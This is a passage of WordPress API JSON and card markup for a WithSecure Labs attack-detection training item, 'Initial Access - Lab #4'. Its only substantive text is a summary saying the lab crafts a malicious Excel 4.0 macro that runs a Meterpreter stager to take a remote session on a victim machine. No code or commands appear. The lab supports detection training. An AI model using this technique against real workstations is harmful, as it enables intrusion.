class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In this final lab, we are going to craft a malicious Excel 4.0 Macro (XLM) that executes shellcode. The shellcode will be a Meterpreter stager that will allow us to obtain a remote session on a victim workstation.<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[314,332],"labs_content_type":[317],"class_list":["post-10595","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-endpoint-security"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Endpoint Security<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: Initial Access &#8211; Lab #4<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In this final lab, we are going to craft a malicious Excel 4.0 Macro (XLM) that executes shellcode. The shellcode will be a Meterpreter stager that will allow us to obtain a remote session on a victim workstation.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-4\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item\/10595","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/media?parent=10595"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/categories?post=10595"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/labs_content_type?post=10595"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}